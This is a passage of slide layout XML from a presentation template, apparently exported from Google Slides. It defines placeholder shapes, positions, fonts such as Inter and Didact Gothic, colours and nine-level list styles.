              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Google Shape;184;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2955938" y="1401563"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B9D8EB"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="B9D8EB"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p18"/>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a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>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Blank" showMasterSp="0">
  <p:cSld name="1_Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="186" name="Shape 186"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Google Shape;187;p19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="4731000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="188" name="Google Shape;188;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="263269" y="4384964"/>
            <a:ext cx="2796109" cy="1105875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter SemiBold"/>
                <a:ea typeface="Inter SemiBold"/>
                <a:cs typeface="Inter SemiBold"/>
                <a:sym typeface="Inter SemiBold"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="190" name="Google Shape;190;p19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="730497"/>
            <a:ext cx="8511900" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="21425">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Google Shape;191;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0072CE"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="0072CE"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1518375"/>
            <a:ext cx="7914300" cy="2676300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-317500" lvl="8" marL="4114800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
